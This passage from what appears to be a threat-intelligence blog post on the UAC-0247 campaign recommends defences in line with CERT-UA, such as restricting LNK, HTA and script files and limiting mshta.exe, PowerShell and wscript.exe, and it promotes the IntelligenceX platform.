Security teams can use IntelligenceX to monitor suspicious domains, analyze command-and-control infrastructure, and correlate threat intelligence across multiple sources. This level of insight is essential when dealing with advanced and stealthy campaigns.

Recommended Defensive Measures

To reduce the risk associated with such attacks, CERT-UA recommends restricting the execution of potentially dangerous file types such as LNK, HTA, and JavaScript files. It is also important to limit the use of built-in Windows utilities like mshta.exe, PowerShell, and wscript.exe, which are frequently abused by attackers.

Organizations should also strengthen their monitoring capabilities, educate users about phishing risks, and integrate threat intelligence into their security operations.

Conclusion

The UAC-0247 campaign demonstrates how modern cyber threats are evolving in complexity and sophistication. By combining social engineering with advanced malware techniques, attackers are able to target critical sectors with increasing precision.

To effectively defend against such threats, organizations must adopt a proactive approach that includes improved visibility, intelligence-driven security, and strong internal controls. Leveraging platforms like IntelligenceX, along with robust cybersecurity practices, can significantly enhance an organization’s ability to detect and respond to these evolving threats.